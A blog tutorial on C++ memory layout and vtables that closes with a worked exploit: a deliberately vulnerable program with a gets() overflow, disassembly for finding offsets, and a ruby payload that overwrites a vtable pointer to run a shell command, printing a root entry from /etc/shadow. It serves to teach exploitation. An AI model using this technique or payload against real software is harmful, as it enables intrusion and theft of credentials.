284
May 11, 2013

Exploiting C++ VTABLES: Instance Replacement

The purpose of this post is to demonstrate an interesting way to exploit memory corruption vulnerabilities that let you overwrite an instance of a C++ class. The idea is to alter the instance so that it becomes an instance of a different class. When the code calls virtual methods on what it thinks is an instance of class A, it will really be calling virtual methods of a different class B.

First we have to learn how an instance of a C++ class is represented in memory, and what the difference between a virtual method and a non-virtual method is.

In-Memory Instance Representation

There is no standard that says how C++ classes should be represented in memory. Different compilers use different representations, but they are mostly the same. For the sake of simplicty, I'll only cover very simple types of classes: Those that extend at most one class, which does not extend any other class. So we will not cover multiple inheritance (Class A extends Classes B and C) or repeated inheritance (Class A extends Class B which extends Class C). We will cover classes that don't extend at all, and classes that extend a single base class (Class A extends Class B, but Class B doesn't extend anything). See C++ Under the Hood for a description of more the advanced kinds of inheritance.

For this guide I'll be using G++ on x86 (32 bit) Linux. If you're running a 64-bit system, you can produce 32-bit binaries by passing the -m32 flag to G++.

Bare Classes

Let's begin with the simplest case. A class that has no member variables, and only non-virtual methods.

 1 #include <cstdlib>
 2 #include <cstdio>
 3 #include <cstring>
 4 
 5 class Foo {
 6     public:
 7         void doSomething()
 8         {
 9             printf("Hello!\n");
10         }
11 };
12 
13 int main(int argc, char **argv)
14 {
15     Foo f;
16     f.doSomething();
17 
18     printf("sizeof(f) = %d, f = %d\n", sizeof(f), (int)(*(char *)&f));
19 
20     *(char*)&f = 42;
21     f.doSomething();
22 
23     printf("sizeof(f) = %d, f = %d\n", sizeof(f), (int)(*(char *)&f));
24 }
Hello!
sizeof(f) = 1, f = -9
Hello!
sizeof(f) = 1, f = 42

This shows that an instance of Foo takes up just one byte of memory. What is that byte? It's nothing, really. There's no data associated with an instance of Foo, but it has to exist somewhere, so G++ represents it with a meaningless byte. We can even change that byte and the instance will continue to function normally.

Member Variables

Let's stick to non-virtual methods, but this time we'll add some member variables.

 1 #include <cstdlib>
 2 #include <cstdio>
 3 #include <cstring>
 4 
 5 class Foo {
 6     public:
 7         int v1;
 8         int v2;
 9         int v3;
10 
11         Foo()
12         {
13             v1 = 1;
14             v2 = 2;
15             v3 = 3;
16         }
17 
18         void doSomething()
19         {
20             printf("Hello!\n");
21         }
22 };
23 
24 int main(int argc, char **argv)
25 {
26     Foo f;
27     f.doSomething();
28 
29     printf("sizeof(f) = %d\n", sizeof(f));
30 
31     int *vars = (int *)&f;
32     printf("v1 =      %d, v2 =      %d, v3 =      %d\n", f.v1, f.v2, f.v3);
33     printf("vars[0] = %d, vars[1] = %d, vars[2] = %d\n",
34             vars[0], vars[1], vars[2]);
35 
36     vars[0] = 1337;
37     printf("v1 = %d\n", f.v1);
38 }
Hello!
sizeof(f) = 12
v1 =      1, v2 =      2, v3 =      3
vars[0] = 1, vars[1] = 2, vars[2] = 3
v1 = 1337

We've added three int member variables to Foo, and now an instance takes 12 bytes of memory. That makes sense, since each int variable takes 4 bytes, and 3 * 4 = 12. To convince ourselves that it really is just the variables laid out in order, we can treat it as an integer array and print the first 3 elements. We can even modify them that way.

The Foo instance is laid out in memory like this:

struct {
    int v1;
    int v2;
    int v3;
};

Virtual Methods

What's the difference between a virtual method and a non-virtual method? Without any inheritance, both are functionally equivalent. The difference appears when you add inheritance and override methods.

 1 #include <cstdlib>
 2 #include <cstdio>
 3 #include <cstring>
 4 
 5 class Foo {
 6     public:
 7         void nv()
 8         {
 9             printf("Hello from a NON-VIRTUAL method in Foo!\n");
10         }
11 
12         virtual void v()
13         {
14             printf("Hello from a VIRTUAL method in Foo!\n");
15         }
16 };
17 
18 class FooBar : public Foo {
19     public:
20         void nv()
21         {
22             printf("Hello from a NON-VIRTUAL method in FooBar!\n");
23         }
24 
25         virtual void v()
26         {
27             printf("Hello from a VIRTUAL method in FooBar!\n");
28         }
29 };
30 
31 int main(int argc, char **argv)
32 {
33     FooBar foobar;
34     Foo foo;
35 
36     foobar.nv();    // FooBar::nv()
37     foobar.v();     // FooBar::v()
38 
39     Foo *fooptr = (Foo *)&foobar;
40     fooptr->nv();   // Foo::nv()    <--- here's the difference
41     fooptr->v();    // FooBar::v()
42 
43     printf("---------\n");
44 
45     // FooBar is just a pointer to the FooBar vtable.
46     // Foo is just a pointer to the Foo vtable.
47     printf("sizeof(foobar) = %d, sizeof(foo) = %d\n", sizeof(foobar), sizeof(foo));
48 
49     long *foobarAsLong = (long *)&foobar;
50     long *fooAsLong = (long *)&foo;
51     printf("FooBar vtable pointer: %p\n", foobarAsLong[0]);
52     printf("Foo vtable pointer: %p\n", fooAsLong[0]);
53 
54     long **foobarVtable = (long **)&foobar;
55     long **fooVtable = (long **)&foo;
56     // This is the address of FooBar::v()
57     printf("First entry of FooBar VTABLE: %p\n", foobarVtable[0][0]);
58     // This is the address of  Foo::v()
59     printf("First entry of Foo VTABLE: %p\n", fooVtable[0][0]);
60 
61     // If FooBar had more than one virtual method, then you would access the
62     // second's address with foobarVtable[0][1], the third's with
63     // foobarVtable[0][2], and so on.
64 }
Hello from a NON-VIRTUAL method in FooBar!
Hello from a VIRTUAL method in FooBar!
Hello from a NON-VIRTUAL method in Foo!
Hello from a VIRTUAL method in FooBar!
---------
sizeof(foobar) = 4, sizeof(foo) = 4
FooBar vtable pointer: 0x8048928
Foo vtable pointer: 0x8048938
First entry of FooBar VTABLE: 0x80486ba
First entry of Foo VTABLE: 0x8048692

The difference is subtle, but important. Overriding virtual methods behaves how we would expect it to: When we treat the instance of FooBar as though it was an instance of Foo, calling a virtual method runs FooBar's implementation. When we're treating an instance of FooBar as though it was a Foo, and we call a non-virtual method, what gets executed is Foo's implementation (even though it is really a FooBar!).

When we have just a pointer to a Foo object, it could either be pointing to a instance of Foo, or to an instance of FooBar. So how does the runtime know to call FooBar's virtual method when it's really a FooBar, and Foo's virtual method when it's just a Foo? The answer is vtables.

Every class with virtual methods has a hidden member variable: a pointer to a vtable, which is basically just an array of function pointers, one element for each of the class's virtual methods. In this example, an instance of FooBar is just a pointer to FooBar's vtable, which has one element: a pointer to FooBar::v(). An instance of Foo is just a pointer to Foo's vtable, which has one element: a pointer to Foo::v().

If the classes had member variables, they would appear after the vtable pointer.

This means that when we call a virtual method, we have to look up the address of the method in the Class's vtable. The complete process is as follows:

  1. Get the address of the Class's vtable from the object itself.
  2. Get the address of the Class's virtual method from the vtable.
  3. Call the virtual method at that address.

When you add things like multiple inheritance it gets a lot more complicated than this, but now we have a good enough understanding of C++ class internals to do some fun stuff.

Instance Replacement: Turn a Greeter into a CommandExecutor

Here's some vulnerable code. It's a simple program that just asks you if you're 18 or older, and if you answer yes, asks you for your name and greets you. The gets() call on line 32 creates a stack overflow vulnerability.

 1 #include <cstdlib>
 2 #include <cstdio>
 3 #include <cstring>
 4 
 5 class CommandExecutor {
 6     public:
 7         virtual void execute(const char *command)
 8         {
 9             system(command);
10         }
11 };
12 
13 class Greeter {
14     public:
15         virtual void sayHello(const char *name)
16         {
17             printf("Hello, %s!\n", name);
18         }
19 };
20 
21 void greet(Greeter *greeter);
22 void doNothing();
23 
24 int main(int argc, char **argv)
25 {
26     Greeter g;
27     char buf[64];
28     printf("You must be 18 years or older to use this program. Are you? ");
29 
30     doNothing();
31 
32     gets(buf); /* OVERFLOW */
33     if (strcmp(buf, "y") == 0) {
34         greet(&g);
35         return 0;
36     } else {
37         return 1;
38     }
39 }
40 
41 void greet(Greeter *greeter)
42 {
43     char name[100];
44     printf("What is your name? ");
45     fgets(name, 100, stdin);
46     name[strlen(name)-1] = '\0';
47     greeter->sayHello(name);
48 }
49 
50 /* This exists just so that the compiler/linker needs to include
51  * CommandExecutor's code, since otherwise it would be unused. */
52 void doNothing()
53 {
54     CommandExecutor e;
55 }

The gets() call on line 32 will keep accepting data from stdin until it sees a newline. This means we can overflow 'buf', and overwrite anything on the stack that comes after buf. We could use this vulnerability to overwrite the return address and jump into some shellcode, but let's suppose there's a stack canary or something stopping us from doing so.

We can exploit this code by using the buffer overflow vulnerability to change the Greeter object into a CommandExecutor object. Both classes have no member variables, and one virtual method each, so all they are on the stack is a vtable pointer. A Greeter object is just a pointer to Greeter's vtable. A CommandExecutor object is just a pointer to CommandExecutor's vtable. Greeter's vtable contains one entry: a pointer to Greeter::sayHello(). CommandExecutor's vtable contains one entry: a pointer to CommandExecutor::execute().

To change the Greeter 'g' into a CommandExecutor, all we have to do is overwrite its vtable pointer with a pointer to CommandExecutor's vtable. Once we've done that, when greet() calls sayHello() on what it thinks is a Greeter, it will actually be calling execute() on an instance of CommandExecutor, which lets us inject shell commands.

We have to find out where CommandExecutor's vtable is. This is very easy, we just have to look at CommandExecutor's constructor:

08048736 <_ZN15CommandExecutorC1Ev>:
 8048736:       55                      push   ebp
 8048737:       89 e5                   mov    ebp,esp
 8048739:       8b 45 08                mov    eax,DWORD PTR [ebp+0x8]
 804873c:       c7 00 88 88 04 08       mov    DWORD PTR [eax],0x8048888 <--
 8048742:       5d                      pop    ebp
 8048743:       c3                      ret

There it is! 0x08048888 is the address of CommandExecutor's vtable.

Now we can construct the exploit. First we look at the disassembly of main()...

08048624 <main>:
    ...
    0x08048656 <main+50>:	mov    DWORD PTR [esp+0x4],0x8048859
    0x0804865e <main+58>:	lea    eax,[esp+0x1c] <-- buf
    0x08048662 <main+62>:	mov    DWORD PTR [esp],eax
    0x08048665 <main+65>:	call   0x8048554 <strcmp@plt>
    ...
    0x0804866e <main+74>:	lea    eax,[esp+0x5c] <-- g
    0x08048672 <main+78>:	mov    DWORD PTR [esp],eax
    0x08048675 <main+81>:	call   0x8048688 <_Z5greetP7Greeter>
    ...

...and notice 'g' starts at esp+0x5c and 'buf' starts at esp+0x1c. The difference is (esp+0x5c) - (esp+0x1c) = 0x5c - 0x1c = 64. So to exploit this, we just have to input 64 bytes (to fill 'buf') then input 0x8048888 (to overwrite g's vtable address). 'buf' has to strcmp with "y" so our input will have to start with "y\x00". The zero byte is ok, since gets() doesn't stop when it encounters a zero.

Putting it all together:

ruby -e 'print "y\x00" +        // make the age check pass
    "A"*62 +                    // fill the rest of 'buf'
    "\x88\x88\x04\x08" +        // overwrite g's vtable pointer with the
                                // address of CommandExecutor's vtable
    "\n" +                      // end the first input
    "head -n 1 /etc/shadow\n"'  // command to run.
    | ./main

Note the vtable address is encoded in little-endian format.

Output:

$ ruby -e 'print "y\x00" + "A"*62 + "\x88\x88\x04\x08" + "\n" + "head -n 1 /etc/shadow\n"' | ./main
root:$6$iZxyrn8I$SwtrvlV74y7kzc4aXRZDWLuWNHv/GcXbw09wxqzMI5xg8Swf76xGX6xZVfkKu1.eM4LwJRfmMaGnXzGXmMlCE0:15835:0:99999:7:::
You must be 18 years or older to use this program. Are you? What is your name?

What else can you do?

This is cool, but there's a lot more you can do when you have an opportunity to overwrite a vtable pointer. Some interesting ideas are:

Credit

The idea of overwriting C++ vptrs has been known for over a decade. So I didn't invent this technique by any means. As best I can tell the idea was first presented in SMASHING C++ VPTRS by rix in Phrack 56. There's also this slide deck from the same year: Advanced Buffer Overflow Technique - Greg Hoglund (Black Hat)